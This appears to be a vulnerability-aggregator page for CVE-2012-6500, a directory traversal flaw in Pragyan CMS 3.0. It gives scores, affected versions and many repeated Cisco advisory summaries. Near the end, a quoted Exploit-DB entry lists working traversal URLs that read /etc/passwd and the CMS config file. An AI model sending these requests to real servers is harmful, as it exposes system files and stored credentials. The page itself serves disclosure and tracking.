CVE-2012-6500
published 2013-01-12CVE-2012-6500: Directory traversal vulnerability in download.lib.php in Pragyan CMS 3.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the…
PriorityP336medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.39%
87.3th percentile
Directory traversal vulnerability in download.lib.php in Pragyan CMS 3.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the fileget parameter in a profile action to index.php.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pragyan_cms_project | pragyan_cms | <= 3.0 | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
| pragyan_cms_project | pragyan_cms | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_cisco9.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2q9m-7rqw-8rxq: Directory traversal vulnerability in download
ghsa_unreviewed·2022-05-17
CVE-2012-6500 [MEDIUM] CWE-22 GHSA-2q9m-7rqw-8rxq: Directory traversal vulnerability in download
Directory traversal vulnerability in download.lib.php in Pragyan CMS 3.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the fileget parameter in a profile action to index.php.
Cisco
Cisco ASA 1000V Cloud Firewall H.323 Inspection Denial of Service Vulnerability
vendor_cisco·2013-01-17·CVSS 7.8
CVE-2012-5419 [HIGH] CWE-399 Cisco ASA 1000V Cloud Firewall H.323 Inspection Denial of Service Vulnerability
Cisco ASA 1000V Cloud Firewall H.323 Inspection Denial of Service Vulnerability
A vulnerability in Cisco Adaptive Security Appliance (ASA) Software for the Cisco ASA 1000V Cloud Firewall may cause the Cisco ASA 1000V to reload after processing a malformed H.323 message. Cisco ASA 1000V Cloud Firewall is affected when H.323 inspection is enabled.
Cisco has released software updates that address this vulnerability.
This advisory is posted at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130116-asa1000v
Note: Only Cisco ASA Software for the Cisco ASA 1000V Cloud Firewall is affected by the vulnerability described in this advisory. Cisco ASA 5500 Series Adaptive Security Appliances, Cisco Catalyst 6500 Series ASA Services Modu
Cisco
Multiple Vulnerabilities in Cisco Firewall Services Module
vendor_cisco·2012-10-10·CVSS 9.0
CVE-2012-4661 [CRITICAL] CWE-119 Multiple Vulnerabilities in Cisco Firewall Services Module
Multiple Vulnerabilities in Cisco Firewall Services Module
The Cisco Firewall Services Module (FWSM) for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers is affected by the
following vulnerabilities:
DCERPC Inspection Buffer Overflow Vulnerability
DCERPC Inspection Denial Of Service Vulnerabilities
These vulnerabilities are not interdependent; a release that is
affected by one vulnerability is not necessarily affected by the
other.
Exploitation of these vulnerabilities could allow an unauthenticated,
remote attacker to trigger a reload of the affected device, or to execute arbitrary commands. Repeated
exploitation could result in a denial of service (DoS) condition.
Cisco has released software updates that address these vulnerabilities. There are no workarounds that m
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco·2012-10-10·CVSS 9.0
CVE-2012-4643 [CRITICAL] CWE-119 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco
Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the
following vulnerabilities:
DHCP Memory Allocation Denial of Service Vulnerability
SSL VPN Authentication Denial of Service Vulnerability
SIP Inspection Media Update Denial of Service Vulnerability
DCERPC Inspection Buffer Overflow Vulnerability
Two DCERPC Inspection Denial Of Service Vulnerabilities
These vulnerabilities are independent of each other; a release that is
affected by one of the vulnerabilities may not be affected by the
others.
Successful exploitation of any of these vulnerabilities could allow an unauthenti
Cisco
Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module Denial of Service Vulnerability
vendor_cisco·2012-06-20·CVSS 7.8
CVE-2012-3058 [HIGH] Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module Denial of Service Vulnerability
Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module Denial of Service Vulnerability
Cisco ASA 5500 Series Adaptive Security Appliances (Cisco ASA) and Cisco
Catalyst 6500 Series ASA Services Module (Cisco ASASM) contain a vulnerability that may allow an unauthenticated, remote
attacker to cause the reload of the affected device.
Cisco has released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120620-asaipv6
Cisco
Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability
vendor_cisco·2012-03-14·CVSS 7.8
CVE-2012-0356 [HIGH] Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability
Cisco Firewall Services Module Crafted Protocol Independent Multicast Message Denial of Service Vulnerability
The Cisco Catalyst 6500 Series Firewall Services Module (FWSM) contains a Protocol Independent Multicast (PIM) Denial of Service Vulnerability.
Cisco has released software updates that address this vulnerability. There may be workarounds that mitigate this vulnerability. See the "Workarounds" section of this advisory. This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120314-fwsm
Note: The Cisco Adaptive Security Appliance (ASA) and the Cisco Catalyst 6500 ASA Services Module (ASASM) are also affected by this vulnerability.
A separate Cisco Security Advisory has been published to disclose the
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco·2012-03-14·CVSS 7.8
CVE-2012-0353 [HIGH] Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) are affected by the following vulnerabilities:
Cisco ASA UDP Inspection Engine Denial of Service Vulnerability
Cisco ASA Threat Detection Denial of Service Vulnerability
Cisco ASA Syslog Message 305006 Denial of Service Vulnerability
Protocol Independent Multicast Denial of Service Vulnerability
These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others.
Cisco has released software updates that address these vulnerabilities. Workarounds are available to mitigate
Cisco
Cisco ASA 1000V Cloud Firewall H.323 Inspection Denial of Service Vulnerability
vendor_cisco
CVE-2012-5419 Cisco ASA 1000V Cloud Firewall H.323 Inspection Denial of Service Vulnerability
CVE-2012-5419: Cisco ASA 1000V Cloud Firewall H.323 Inspection Denial of Service Vulnerability
A vulnerability in Cisco Adaptive Security Appliance (ASA) Software for the Cisco ASA 1000V Cloud Firewall may cause the Cisco ASA 1000V to reload after processing a malformed H.323 message. Cisco ASA 1000V Cloud Firewall is affected when H.323 inspection is enabled. Cisco has released software updates that address this vulnerability. This advisory is posted at the following link: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130116-asa1000v Note : Only Cisco ASA Software for the Cisco ASA 1000V Cloud Firewall is affected by the vulnerability described in this advisory. Cisco ASA 5500 Series Adaptive Security Appliances, Cisco Catalyst 6500 Series ASA Se
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-4643 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-4643: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities: DHCP Memory Allocation Denial of Service Vulnerability SSL VPN Authentication Denial of Service Vulnerability SIP Inspection Media Update Denial of Service Vulnerability DCERPC Inspection Buffer Overflow Vulnerability Two DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Successful exploitation of any of these vulnerabilities could allow an
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-4663 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-4663: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities: DHCP Memory Allocation Denial of Service Vulnerability SSL VPN Authentication Denial of Service Vulnerability SIP Inspection Media Update Denial of Service Vulnerability DCERPC Inspection Buffer Overflow Vulnerability Two DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Successful exploitation of any of these vulnerabilities could allow an
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-0355 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-0355: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) are affected by the following vulnerabilities: Cisco ASA UDP Inspection Engine Denial of Service Vulnerability Cisco ASA Threat Detection Denial of Service Vulnerability Cisco ASA Syslog Message 305006 Denial of Service Vulnerability Protocol Independent Multicast Denial of Service Vulnerability These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Cisco has released software updates that address these vulnerabilities.
Bug IDs: CSCtq10441, CSCt
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-4659 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-4659: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities: DHCP Memory Allocation Denial of Service Vulnerability SSL VPN Authentication Denial of Service Vulnerability SIP Inspection Media Update Denial of Service Vulnerability DCERPC Inspection Buffer Overflow Vulnerability Two DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Successful exploitation of any of these vulnerabilities could allow an
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-0356 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-0356: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) are affected by the following vulnerabilities: Cisco ASA UDP Inspection Engine Denial of Service Vulnerability Cisco ASA Threat Detection Denial of Service Vulnerability Cisco ASA Syslog Message 305006 Denial of Service Vulnerability Protocol Independent Multicast Denial of Service Vulnerability These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Cisco has released software updates that address these vulnerabilities.
Bug IDs: CSCtq10441, CSCt
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-0354 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-0354: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) are affected by the following vulnerabilities: Cisco ASA UDP Inspection Engine Denial of Service Vulnerability Cisco ASA Threat Detection Denial of Service Vulnerability Cisco ASA Syslog Message 305006 Denial of Service Vulnerability Protocol Independent Multicast Denial of Service Vulnerability These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Cisco has released software updates that address these vulnerabilities.
Bug IDs: CSCtq10441, CSCt
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-4660 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-4660: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities: DHCP Memory Allocation Denial of Service Vulnerability SSL VPN Authentication Denial of Service Vulnerability SIP Inspection Media Update Denial of Service Vulnerability DCERPC Inspection Buffer Overflow Vulnerability Two DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Successful exploitation of any of these vulnerabilities could allow an
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-0353 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-0353: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) are affected by the following vulnerabilities: Cisco ASA UDP Inspection Engine Denial of Service Vulnerability Cisco ASA Threat Detection Denial of Service Vulnerability Cisco ASA Syslog Message 305006 Denial of Service Vulnerability Protocol Independent Multicast Denial of Service Vulnerability These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Cisco has released software updates that address these vulnerabilities.
Bug IDs: CSCtq10441, CSCt
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-4661 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-4661: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities: DHCP Memory Allocation Denial of Service Vulnerability SSL VPN Authentication Denial of Service Vulnerability SIP Inspection Media Update Denial of Service Vulnerability DCERPC Inspection Buffer Overflow Vulnerability Two DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Successful exploitation of any of these vulnerabilities could allow an
Cisco
Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module Denial of Service Vulnerability
vendor_cisco
CVE-2012-3058 Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module Denial of Service Vulnerability
CVE-2012-3058: Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module Denial of Service Vulnerability
Cisco ASA 5500 Series Adaptive Security Appliances (Cisco ASA) and Cisco Catalyst 6500 Series ASA Services Module (Cisco ASASM) contain a vulnerability that may allow an unauthenticated, remote attacker to cause the reload of the affected device. Cisco has released software updates that address this vulnerability.
Bug IDs: CSCua27134, CSCua27134
Cisco
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
vendor_cisco
CVE-2012-4662 Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
CVE-2012-4662: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances (ASA) and Cisco Catalyst 6500 Series ASA Services Module (ASASM) may be affected by the following vulnerabilities: DHCP Memory Allocation Denial of Service Vulnerability SSL VPN Authentication Denial of Service Vulnerability SIP Inspection Media Update Denial of Service Vulnerability DCERPC Inspection Buffer Overflow Vulnerability Two DCERPC Inspection Denial Of Service Vulnerabilities These vulnerabilities are independent of each other; a release that is affected by one of the vulnerabilities may not be affected by the others. Successful exploitation of any of these vulnerabilities could allow an
No detection rules found.
Exploit-DB
Samsung D6000 TV - Multiple Vulnerabilities
exploitdb·2012-04-19
CVE-2012-4330 Samsung D6000 TV - Multiple Vulnerabilities
Samsung D6000 TV - Multiple Vulnerabilities
---
#######################################################################
Luigi Auriemma
Application: Samsung devices with support for remote controllers
http://www.samsung.com
Versions: current
Platforms: the vulnerable protocol is used on both TV and blue-ray
devices so both of them should be vulnerable (my tests
were performed only on a D6000 TV with the latest
firmware); the following are the products listed on the
iTunes section of the app but note that I have NOT
tested them:
- TV released in 2010 with Internet@TV feature
Models greater than or equal to LCD 650, LED 6500 and PDP 6500
- TV released in 2011 with AllShare feature
Models greater than or equal to LCD 550, LED 5500 and PDP 5500
- BD released in 2011 with Smart Hub feature
M
Exploit-DB
Pragyan CMS 3.0 - Remote File Disclosure
exploitdb·2012-01-10
CVE-2012-6500 Pragyan CMS 3.0 - Remote File Disclosure
Pragyan CMS 3.0 - Remote File Disclosure
---
Title
Pragyan CMS v 3.0 => [Remote File Disclosure]
Author
Or4nG.M4n
Download
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2
vuln
download.lib.php line 16
vuln
index.php line 234
$_GET['fileget']
exploit http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../ etc/passwd . boot.ini
Download Config file
exploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php
No writeups or analysis indexed.
2013-01-12
Published